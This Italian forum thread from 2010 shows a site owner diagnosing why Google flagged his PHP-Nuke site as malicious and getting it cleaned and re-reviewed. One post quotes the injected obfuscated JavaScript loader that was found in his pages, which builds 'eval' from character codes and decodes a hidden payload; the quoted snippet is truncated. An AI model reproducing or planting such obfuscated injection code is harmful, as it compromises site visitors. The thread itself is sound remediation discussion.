TSmenu

Attualmente in www.tuttosoft.it è stata caricata la versione del nuke 7.9 TS sono presenti la bellezza di 78 categorie e 713 downloads       Utenti registrati:  13490    Admin del sito sono: 1  Ultimi 5 Utenti registrati :    buagamasta    homebrew    kevyn_morgan    abramax    208ferro

Fai Una Donazione

Siti Amici

©

Pubblicità

Ts Tags Ver 1.0
IP Remote Changer Donazione PageRank Misura il PageRank Directory Fonts Temi PhpBB LGNuke 2.0.0RC Banners Avatars Nuke PageRank 5 OpenId 0.3 new Sitemap Matteoiamma Staff del sito Temi Phpnuke Weblord Karmik koala Gnu License Numbers 1.0 Moduli Indicizzazione del tuo sito Nuke Sentinel 2.6.01 Giovannib Ts Contacts Addons Notepad ++ Splatt Chat 0.8.29 Alexthemaster Più comandi in uno unico con Linux da terminale Mappa sito Ubuntu 9.10 vea83inc Trucchi Nuke Cambiare Ip da remoto Ts Menu 5.3 Installare Lamp su Ubuntu Linux PR5 Generatore Numeri casuale Configurare la scheda di rete da terminale con Ubuntu No Spam Attack 3.1 Forum phbb3 V 3.0.4 Mascherare Mac-Address con Linux Slaybook 1.2.1 Forums Php Nuke Tuttosoft Pilia Federico JQooBe Ranks Forum Php Nuke Nukelive 1.0 Virit Antivirus Sottoscriviti Ts Gallery Oracle su Linux Queen_live78 Serpe76 Blocchi Installare Cairo-Dock su Ubuntu Linux a 64bit Proxy su Linux Ubuntu Banner

Tuttosoft.it Php Nuke Italian Community: Forums

TUTTOSOFT :: Leggi il Topic - [Risolto] Sito Bloccato da google Benvenuti nel Forum di tuttosoft.it , per qualsiasi problema postate pure nel forum vi verrà data una risposta entro le 24 ore dal momento del Post. Buona Navigazione
 FAQFAQ   CercaCerca   Gruppi utentiGruppi utenti   ProfiloProfilo   Messaggi PrivatiMessaggi Privati   LoginLogin 

[Risolto] Sito Bloccato da google

 
Nuovo Topic   Topic chiuso    Indice del forum -> Sicurezza
Precedente :: Successivo  
Autore Messaggio
matteoiamma
Moderatore
Moderatore


Registrato: May 17, 2008
Messaggi: 531
Località: Torremaggiore(Foggia)

MessaggioInviato: Mar Giu 08, 2010 11:22 am    Oggetto: [Risolto] Sito Bloccato da google Rispondi citando

Ciao a tutti ragazzi,
il mio sito matteoiammarrone.com è stato bloccato da google e da Google Chrome.

(Credo anche da Firefox).

Ecco a voi:

http://www.google.com/safebrowsing/diagnostic?site=http://www.matteoiammarrone.com/&hl=it

Come faccio a risolvere?

Altre volte risolvevo togliendo il code javascript che trovato in alcune pagine,
ma questa volta non riesco a trovare nessun codice javascript che io non abbia messo.

Per ora sto analizzando delle pagine per vedere di trovare questo codice, ma non lo trovo e ho ottimizzato le tabelle del database dal phpmyadmin.

Come faccio a sapere le 3 pagine in cui e' presente il malware per poterlo togliere?


Aiuto!

Very Happy
_________________
Non inviatemi messaggi privati o email,
gratis aiuto solo sui forum.
CLEANUKE.IT - CLEAN NUKE OFFICIAL COMMUNITY
MATTEOIAMMARRONE.COM
FORUMRAGAZZI.IT


Ultima modifica di matteoiamma il Ven Giu 11, 2010 9:31 am, modificato 1 volta in totale
Torna in cima
Profilo Messaggio privato Invia email HomePage MSN Messenger
weblord
Moderatore
Moderatore


Registrato: Dec 10, 2007
Messaggi: 195

MessaggioInviato: Mar Giu 08, 2010 5:28 pm    Oggetto: Rispondi citando

Per caso hai inserito nel sito qualche contatore di visite gratuito?

Molto spesso dipende da quello...

Ciao Wink
Torna in cima
Profilo Messaggio privato HomePage
matteoiamma
Moderatore
Moderatore


Registrato: May 17, 2008
Messaggi: 531
Località: Torremaggiore(Foggia)

MessaggioInviato: Gio Giu 10, 2010 8:38 am    Oggetto: Rispondi citando

m..
non ci avevo pensato...
ho inserito il contatore di histats.

Pero' c'è da sempre e non mi ha mai dato problemi.

CMq..ora provo a toglierlo.
_________________
Non inviatemi messaggi privati o email,
gratis aiuto solo sui forum.
CLEANUKE.IT - CLEAN NUKE OFFICIAL COMMUNITY
MATTEOIAMMARRONE.COM
FORUMRAGAZZI.IT
Torna in cima
Profilo Messaggio privato Invia email HomePage MSN Messenger
matteoiamma
Moderatore
Moderatore


Registrato: May 17, 2008
Messaggi: 531
Località: Torremaggiore(Foggia)

MessaggioInviato: Gio Giu 10, 2010 8:45 am    Oggetto: Rispondi citando

Ciao,
devo dirti che purtroppo non era quello il problema Rolling Eyes Rolling Eyes

Continua a segnalarmelo come sito affetto da malware...

Embarassed Embarassed
_________________
Non inviatemi messaggi privati o email,
gratis aiuto solo sui forum.
CLEANUKE.IT - CLEAN NUKE OFFICIAL COMMUNITY
MATTEOIAMMARRONE.COM
FORUMRAGAZZI.IT
Torna in cima
Profilo Messaggio privato Invia email HomePage MSN Messenger
weblord
Moderatore
Moderatore


Registrato: Dec 10, 2007
Messaggi: 195

MessaggioInviato: Gio Giu 10, 2010 10:09 am    Oggetto: Rispondi citando

E' normale... fino a che non viene fatto un nuovo controllo l'avviso non viene tolto.

Devi seguire le istruzioni che fornisce Google http://www.google.com/support/webmasters/bin/answer.py?answer=163633

Ciao
Torna in cima
Profilo Messaggio privato HomePage
matteoiamma
Moderatore
Moderatore


Registrato: May 17, 2008
Messaggi: 531
Località: Torremaggiore(Foggia)

MessaggioInviato: Gio Giu 10, 2010 8:08 pm    Oggetto: Rispondi citando

Ciao, grazie l'aiuto.

Sono andato nell'area Strumenti webmaster per google,
ho avuto la conferma che il codice maligno non e' quello di histats, bensi' questo:


Codice:
<script language="javascript">var ez=window;function asd(s){
r="";for(i=0;i<s.length;i++){if(s.charAt(i)=="Z"){s1="%"}els
e{s1=s.charAt(i)}r=r+s1;}return unescape(r);}var sdkajsnd=St
ring.fromCharCode(101,118,97)+"l";function fds(){return asd(
$a);}var $a="Z64zZ3dZ22Z2566uncZ2574iZ256fnZ2520Z2564wZ2528t
)Z257bcaZ253dZ2527Z252564ocZ252575mZ2565nZ2525Z2537Z2534.wZ2
572Z252569Z25257Z2534eZ252528Z252522Z2527;Z2563eZ253dZ2527Z2
52522Z252529Z2527;cbZ253dZ2527Z25253csZ252563riZ2570Z2525Z25
37Z2534 Z25256cZ252561Z25256eZ252567uZ2525Z2536Z2531geZ25253
dZ25255Z2563Z252522jZ2561vasZ2563Z2525Z25372iZ25257Z2530tZ25
255Z2563Z252522Z25253eZ2527;ccZ253dZ2527Z25253cZ25255cZ25252
fsZ252563riZ2570Z252574Z25253eZ2527Z253bwiZ256edoZ2577Z255bZ
2522eZ2522+Z2522Z2522+ Z2522vZ2522+Z2522alZ2522](uneZ2573Z25
63apeZ2528Z2574)Z2529};Z22;dcZ3dZ22rs}vybZ3esZ257F}7+fqb0}Z2
57F~dxc0-0~ug0Qbbqi87trc7Z3c07id~7Z3c07f}d7Z3c07f}b7Z3c07}|s
7Z3c07Z257FhZ7b7Z3c07vtc7Z3c07rfv7Z3c07iec7Z3c07}s`7Z3c07~sj
7Z3c07wtg79+fqb0|uddubc0-0~ug0Qbbqi87q7Z3c7r7Z3c7s7Z3c7t7Z3c
7u7Z


Ho setacciato il mio ftp, facendo un po' di pulizia e analizzando ogni singola index e ho trovato delle pagine in cui questo codice non l'avevo ancora rimosso, ora l'ho fatto
e inviato una richiesta a google di rivalutazione del mio sito.

SPeriamo bene.
_________________
Non inviatemi messaggi privati o email,
gratis aiuto solo sui forum.
CLEANUKE.IT - CLEAN NUKE OFFICIAL COMMUNITY
MATTEOIAMMARRONE.COM
FORUMRAGAZZI.IT
Torna in cima
Profilo Messaggio privato Invia email HomePage MSN Messenger
weblord
Moderatore
Moderatore


Registrato: Dec 10, 2007
Messaggi: 195

MessaggioInviato: Ven Giu 11, 2010 7:33 am    Oggetto: Rispondi citando

Ho visto che hai risolto Very Happy
Comunque cercando in rete ho capito che il problema non era del tuo sito ma di Aruba Wink
Questo è uno dei risultati che ho trovato:
http://comments.gmane.org/gmane.comp.security.bugtraq/43246
Ciao
Torna in cima
Profilo Messaggio privato HomePage
matteoiamma
Moderatore
Moderatore


Registrato: May 17, 2008
Messaggi: 531
Località: Torremaggiore(Foggia)

MessaggioInviato: Ven Giu 11, 2010 9:27 am    Oggetto: Rispondi citando

Bene,
ti ringrazio per la segnalazione e per tutti gli aiuti.

Sono felice di aver risolto, chiudo il topic.

GRazie ancora.
Matteo.
_________________
Non inviatemi messaggi privati o email,
gratis aiuto solo sui forum.
CLEANUKE.IT - CLEAN NUKE OFFICIAL COMMUNITY
MATTEOIAMMARRONE.COM
FORUMRAGAZZI.IT
Torna in cima
Profilo Messaggio privato Invia email HomePage MSN Messenger
Mostra prima i messaggi di:   
Nuovo Topic   Topic chiuso    Indice del forum -> Sicurezza Tutti i fusi orari sono GMT + 1 ora
Pagina 1 di 1

 
Vai a:  
Non puoi inserire nuovi Topic in questo forum
Non puoi rispondere ai Topic in questo forum
Non puoi modificare i tuoi messaggi in questo forum
Non puoi cancellare i tuoi messaggi in questo forum
Non puoi votare nei sondaggi in questo forum

Powered by phpBB © 2001, 2005 phpBB Group
Tema Creato da Queen_live78 © 2007